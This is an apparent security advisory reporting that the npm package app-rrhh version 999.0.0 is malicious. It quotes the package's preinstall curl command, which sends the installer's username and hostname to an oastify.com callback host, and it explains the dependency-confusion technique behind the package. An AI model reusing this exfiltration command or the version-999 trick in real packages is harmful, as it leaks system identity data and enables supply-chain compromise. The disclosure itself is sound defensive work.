MAL-2026-16144
Malicious code in app-rrhh (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (cda153823a2c046e4d97069c84961e1a8b302fc425e238fce36bd8a205d19b88) package.json declares a preinstall script that runs `curl http://ebtld4p8aq3rl950g6jgn217aygp4fs4.oastify.com/$(whoami)/$(hostname)` on `npm install`. The installer's OS username and hostname are embedded in the URL path and sent over plaintext HTTP to a Burp Collaborator (oastify.com) callback subdomain, confirming code execution on the installing host and leaking installer identity data to an attacker-controlled destination. The package name `app-rrhh` at version `999.0.0` with a description referencing dependency confusion is consistent with a dependency-confusion attack shape designed to win resolution against an internal package of the same name.
Are you affected?
Enter the version of the package you're using.
Affected packages
No fixed version published yet for app-rrhh (npm). Pin to a known-safe version or switch to an alternative.